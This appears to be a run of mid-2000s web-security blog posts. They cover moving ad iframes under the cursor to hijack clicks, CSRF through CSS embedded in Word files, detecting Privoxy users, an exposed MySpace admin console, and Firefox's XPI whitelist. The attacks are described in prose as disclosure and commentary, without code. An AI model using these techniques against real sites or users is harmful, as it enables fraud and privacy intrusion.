On the sla.ckers.org board Lobas asked a question regarding stealing clicks. The short answer is you cannot force a click inside of an iframe on another domain. The cross domain policy prohibits that, especially since inside banner advertizers you never know what the links will be. However, there is another way that Jeremiah Grossman mentioned a while back that I thought was pretty clever. You can actually move the banner ad to be placed immediately below the mouse so that when it’s clicked the user is tricked into sending their click event to the iframe beneath the cursor.

I wrote a sample code off of one of those annoying cursor following scripts to show that you can force text in a div (what could be an iframe to the banner ad) to be placed immediately below the image. What I haven’t shown is that the onclick event handler can be used to make the div appear at the right moment, or that you can make it semi-transparent or any of the other fun tricks. But this proof of concept proves that iframes are not really a particularly good way of protecting from click events. Banner advertisers beware!

I can’t say this really surprises me too much give my own results of other high profile domains, but x90 (NOP) was able to locate MySpace’s administration console. That just sounds like a bad idea - leaving the gateway to your administration publically facing. He was able to get it to error out which provided some interesting results as well.

Fierce is a good first-pass reconnaissance tool, and as you can tell it shows you thinks that aren’t obvious at first blush when you aren’t sure what is hosted at the domain. In just a few minutes of testing you can uncover huge swaths of vulnerable targets to exploit. This is no exception. It’s neat seeing people try it out and see what it can find for you. Let me know if anyone else finds interesting results or case studies. In the meantime, I hope MySpace knows enough to take this server off-line until they can harden it or at minimum move it to a less obvious place.

This is a really upsetting story about how a teenager was infected by a trojan, used as a fileserver for child pornography, and then attempted to be prosecuted as a sex offender. The sex offender charge was based off of a plea charge after admitting to showing other teenaged boys a playboy magazine. The circumstances are so ridiculous it’s just painful to read. The jist is the boy went to visit a porn site that infected his computer, and then the police detected the computer uploading child pornography.

I was asked after being sent this if having a firewall and anti-virus is enough to protect your computer. Unfortunately the answer is no. Let’s think about session riding for a second. It is trivial to get any user to download images from any website that doesn’t protect itself with a simple IMG tag. In this way a user can visit an otherwise benign site, and be forced to download child pornography or perform attacks on servers or whatever the attacker wants by proxy. Very scary.

I’m not a huge fan of virtualization in production environments (feels an awful lot like putting all your eggs in one basket and slowing everything down in the process) but you cannot beat it for testing. Today I found out that VMWare server is now free for download. Their major upsell is service contracts and add-ons, but if you don’t tend to use that or need it for testing and you run Windows but want to run other operating systems or perform potentially dangerous tests, this is the software for you.

If you’ve never played with VMWare before you’re missing out. You can read from a bootable ISO or you can compile your own OS into what is essentially a large file that represents the computer’s disc. That computer can be copied too. So if you want to run a dangerous test, you copy the file, boot it, install your dangerous software, run it, perform your tests, then shut it down and delete it without worry since it never touched your real drive or your original image. Perfect! If you’ve got an extra copy of a distro lying around that you never got to play with and didn’t feel like repartitioning a drive, this is definitely the software for you.

A few years back I had an interesting business model requiring me to talk to countries like Sealand. Sealand is the world’s smallest country and it’s now for sale. The reason why Sealand is important to the security world is that it is not just an oddity with airgap protection but it is also the world’s most secure data-center. With no physical access, ultra secure computers, and networks, it is by far the most secure commercial hosting environment on earth.

Anyone have a billion to spend? I have got some great business models. Unfortunately the island is probably more hassle than it’s worth. Being extremely poorly known except for the security community doesn’t help much. Also it is obviously under current and constant threat of being taken over by Britain, making it a risky proposition for any high net worth activities that you want off shore and out of the hands of extradition treaties. It’ll be interesting to hear the future of the island state.

If you don’t remember who Richard Stiennon is, think back to a few years ago and see if you can remember the words, “IDSs are dead”. Ring a bell? He is an analyst at Gartner focusing on security. I met him several years ago, although I’m sure he would have no idea who I am now, even though I accurately predicted the rise of the event correlation (SIM) services. Well, I found his blog almost by accident today and his most recent post actually turned out to be fairly interesting. He wrote about the top 10 threats for 2007. He was a little scattered in the topics he went into but most of them were pretty interesting to discuss. Here are some of my thoughts:

His second and third prediction is that DDoS in support of Phishing and fraud will become a big deal in 2007. I really don’t see this one happening. I get what he’s saying, but DDoS is noisy, and doesn’t actually aid in phishing. Plus if the bad guys have compromised servers why not use them for more phishing, which is far more lucrative than shutting down a server (except in the random cases of extortion - “pay me $10k and I’ll let your server come back up”). I just don’t believe this is happening all that often. They bad guys can make $10k per phishing incident. It’s way more scalable to stick to phishing. I only know of two cases where DDoS extortion has happened, and both of them were online casinos.

He suggests in his fourth bullet that DNS will be a huge target over the coming year. Maybe. It’s hard to say, especially since it’s far easier to let it work for you in the case of XSS malware. I’m not sure I agree with this since there are easier ways to attack a target. But you never know. I also thought pharming would never be a big deal when everyone was hyping that one up and… er… no wait, it never was.

His seventh bullet talks about MySpace having to grow up and become more secure like the rest of their competitors. I don’t know that I agree that this is the 7th largest threat in 2007 (shutting down one community site) but I think the ramifications of why this is happening is easily within the top 10. He’s got a good point here. I think something that we have not spent enough time thinking about is the downstream impact of these types of issues to large businesses. Could a few XSS holes literally shut down a billion dollar company? That’s a big deal.

Number eight is also about XSS although Richard doesn’t mention the word. He talks about backdooring media files (pdp’s backdooring quicktime files and Mp3 files, no doubt) as well as spam advertising inside of the movie files. I would hardly call this the eight biggest threat on the Internet, because the files can be scanned for the backdoor and who cares if there is a little spam. It’s not a big threat to the Internet. So, unfortunately I think he’s way off on this one.

Number nine is about how the global network infrastructure is showing signs of strain under the new heavy weight content of the dynamic internet. I doubt this really will mean much to anyone other than more use of content delivery networks as well as additional money for the carriers who lay fiber (which was his comment).

His number ten threat is that Vista isn’t going to do anything in terms of Security. Well, that’s probably true, but that’s not a new threat, that’s just not an increase in security to match the increase in level of attacks against the new platform. But who wants to go after desktop machines when everyone is putting their information online anyway? That’s where the real money is. The only reason people go after home computers these days is to install keyloggers and turn them into spam/phishing machines. Also, the bigger issue is that everything is becoming web enabled. Alas, we’re going to see a lot more high profile information disclosures next year is my prediction. So I think he had the right idea, but he didn’t take it to the next obvious place.

I don’t mean to put Richard down here - he’s a very bright guy. Unfortunately, I think this year he spent too much time talking to a few people who didn’t have their pulse on the real issues. No doubt 2007 will be interesting though. I’m looking forward to it.

Well the old trick still works but I just wasn’t satisfied with that. I really like to break Privoxy for some reason. I have nothing against it, it just seems like a kludge to me. A Kludge that needs to be broken. So I decided to come up with another way to do the exact same thing, only in a trickier way. This time I used a technique stolen right out of Jeremiah’s handbook. I used CSS and JavaScript to detect if an embedded CSS file works or not.

Click here with Privoxy and JavaScript turned on to have it detect you. That’s right, I noticed that Privoxy had it’s own custom style sheet. It embeds it whenever it gives you an error message (which is relatively often). That style sheet overwrites a particular class called “warning”. So I created an EM tag with a warning class, and then wrote a little peice of JavaScript stolen almost word for word from Jeremiah’s CSS history hack and poof.

You can now (again) detect if users are using Privoxy, which might tell you something about them, or may cause you to take different actions based on that fact. Privoxy isn’t so private after all.

I got this link today from Reuters discussing how a 64 year old hacker decided to write a logic bomb to crash his ex company’s stock. Wow, has this guy been watching hackers too much or what? Next people are going to start skateboarding in the office wearing capes! I was really surprised to read this, because a) deleting files never crashes stock, or every virus on the planet would have a high potential of destroying corporate valuations and b) he didn’t attempt to do it publically (and public perception is the only thing that drives stock price).

But this is interesting because it’s a common mis perception amongst people that hackers could completely wipe anything out that they put their minds to. In some cases that’s true, but clearly not in all cases. I think people have sort of focused on the hocus pocus aspect of computer security. I think of it a lot like a magic show. It’s amazing and wonderful until you actually see how it works. Then it’s boring and people are only amazed by the ingenuity of the trick, not by the trick itself. That’s one of the reasons I don’t share a lot of what I know with non-security folks. They are less impressed and it doesn’t actually make them hackers in the process. At best it makes them slightly savvy non-tech types. At worst it makes them feel like they can hack things and then they get caught doing stupid stuff.

Anyway, although this wasn’t web app related, I thought it was interesting enough to share for anyone who missed this in the news.

Okay, I didn’t write part I, and really didn’t even know about it until today. Although I invented something like it months and months ago. But the first person to talk about CSRF within Word was Michael Daw. Very interesting concept. In the context that I was using a similar technique I was using it primarily as a web-bug. Michael Daw’s technique is good, but I like mine better, because it’s probably as noisy, however, it leaves no visible queues to the victim.

Michael includes a remote image (I’ve had mixed luck trying this myself). My failures in trying nearly the exact same thing were fixed when I came up with another way to inject embedded files into word. Those files were actually CSS elements that Word will happily go and fetch for you. Click here to get the scoop on how to inject CSS files into Word. Using this same technique you can easily turn this into a complex platform for doing many CSRFs through a single Word file. See what happens when no one tells me about these things? Sheesh! Nice work Michael, I just wish I had seen it when it came out!

Apparently this is true, although I can’t for the life of me figure out why this should be allowed. I ran across an article at DCortesi’s site talking about how Firefox has delegated their security to Google for installation of the Google Sync XPI. Pretty scary actually. What this means is that if an XSS hole were ever found in any whitelisted domain (including XSS in their server, MITM through your proxy server etc…) Firefox will happily allow you to download xpi files. I’ve talked with a few people about this off and on in a different context of loading an xpi file into a data: directive on the whitelisted domain. Yah, that’s scary. This is worse.

This sort of delegation of authority to other domains that you haven’t whitelisted is bad beyond the data directive because the size is unlimited (I have a feeling the data directive has an upper bounds although I have been able to get a data directive the size of 4k before so maybe not). Additionally you can load multiple files and the URL is much smaller if you don’t have to use the data directive. Anyone have any references on the upper bounds?

All of this seems especially bad when Google hasn’t been particularly good about keeping their site bug free. But it’s not just that Google is untrustworthy. You could turn any site into a delegate the way Firefox has been built - as long as you can force a redirection. If you can force the redirection it will allow the file to be downloaded. I haven’t tested this but I’m sure someone on the boards will. I’ll be curious to see if it’s really as bad as I think it is. The web just isn’t safe enough to allow delegates. I guess it’s time to clean out my exception list until I need to install something again.

This yet may prove my theory wrong - that it’s not the browser that’s flawed, it’s the plugins. In this case it definitely is the browser.